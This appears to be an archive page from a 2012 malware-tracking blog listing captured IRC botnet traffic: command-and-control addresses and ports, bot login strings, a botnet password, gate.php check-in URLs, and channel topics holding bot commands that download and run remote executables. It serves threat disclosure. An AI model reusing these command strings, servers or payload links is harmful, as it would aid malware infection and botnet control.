Month: February 2012

Remote Host Port Number 217.160.253.201 2345 NICK New[USA|00|P|78527] PRIVMSG #!loco! :[M]: Thread Disabled. PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email. USER XP-2736 * 0 :COMPUTERNAME MODE New[USA|00|P|78527] -ix JOIN #!loco! PONG 22 MOTD Now talking in #!loco! Topic On: [ #!loco! ] [ .m.s|.m.e foto haaaha http://goo.gl/SgJrv?= ] Topic By: [ wd69 ]Read more...

Remote Host Port Number 199.15.234.7 80 216.18.232.151 6667 NICK New{US-XP-x86}5635115 USER 5635115 “” “5635115” :5635115 MODE New{US-XP-x86}5635115 +iMm JOIN #|3vbot|# PONG :irc.priv8net.com

Traffic – by DNS: micolosoft.in 184.22.188.84 poletaem002.in 199.168.139.53 mekrosoft.in 184.22.188.84 Traffic – by TCP/IP Connections: 184.22.188.84 80 199.168.139.53 80 Traffic – by URL: URL micolosoft.in/zip/gate.php?user=partner_011&uid={B31F86E0-234C-11E1-BBF6-806D6172696F}&os=2 poletaem002.in/image/gate.php?getcmd=1&uid=XANNY here it demands for user and passwd have fun finding them this is what u get if u are infected with: hosting infos: http://whois.domaintools.com/184.22.188.84

File Details MD5 55c55f7764767fd46909b95b1e64b2d1 SHA-1 964d2183f263be8bc565d3dd307486614e5d6ce1 File Type exe First Received (GMT+8) 2012-02-18 06:49:00 Size (bytes) 8704 Weightage 147 virustotal.com 29 vendors detected Static File Header ++++++++++++++++++++++++ FILE HEADER INFORMATION +++++++++++++++++++++++++ TimeStamp: 4F1DB86E Tue Jan 24 03:43:42 2012 Subsystem: 2 (Windows GUI) Image Base: 00400000 Size: 00006000 Code Base: 00001000 Size: 00001600 Data Base: 00003000Read more...

Remote Host Port Number 122.155.18.83 2345 NICK New[USA|00|P|79102] PRIVMSG #!loco! :[M]: Thread Disabled. PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email. USER XP-4584 * 0 :COMPUTERNAME MODE New[USA|00|P|79102] -ix JOIN #!loco! PONG 22 MOTD Now talking in #!loco! Topic On: [ #!loco! ] [ .m.s|.m.e haha foto 😛 http://goo.gl/W2EOO?= ] Topic By: [ wd44Read more...

Resolved : [webingenial.com] To [178.86.30.169] port 1865 Resolved : [webingenial.com] To [213.155.7.39] port 1865 Remote Host Port Number 178.86.30.169 1865 PASS ngrBot 213.155.7.39 1865 PASS ngrBot NICK n{US|XPa}rwslldg USER rwslldg 0 0 :rwslldg Now talking in #main Topic On: [ #main ] [ .m on .up http://www.creatucurso.net/ups.exe 5A551736BBC5CA8245CAB24FA0DD18BC -r ] Topic By: [ fckoffoOo ]Read more...

Very big botnet allready posted diferent domain names from this net here Resolved : [jer0001.in] To [208.83.233.194] port 1889 Resolved : [jer0001.in] To [208.83.232.90] port 1889 Resolved : [jer0001.in] To [208.83.234.66] port 1889 HTTP Conversations: 199.15.234.7:80 – [api.wipmania.com] Request: GET / Response: 200 “OK” 199.7.177.218:80 – [hotfile.com] Request: GET /dl/146860590/6c4cc0b/sgfdfa.exe Response: 302 “Found” 74.120.11.30:80 –Read more...

Resolved : [zaber.zaberhmar.com] To [109.236.86.227] Resolved : [zaber.zaberhmar.com] To [80.79.115.30] Resolved : [zaber.zaberhmar.com] To [109.236.80.114] Resolved : [zaber.zaberhmar.com] To [217.23.9.116] Resolved : [zaber.zaberhmar.com] To [94.102.56.158] Resolved : [zaber.zaberhmar.com] To [50.7.241.242] Resolved : [zaber.zaberhmar.com] To [80.82.64.69] Resolved : [zaber.zaberhmar.com] To [217.23.1.100] Resolved : [zaber.zaberhmar.com] To [217.23.7.147] TCP Connection Attempts: 109.236.80.114:8800 80.79.115.30:8800 109.236.86.227:8800 217.23.9.116:8800 94.102.56.158:8800 50.7.241.242:8800 MalwareRead more...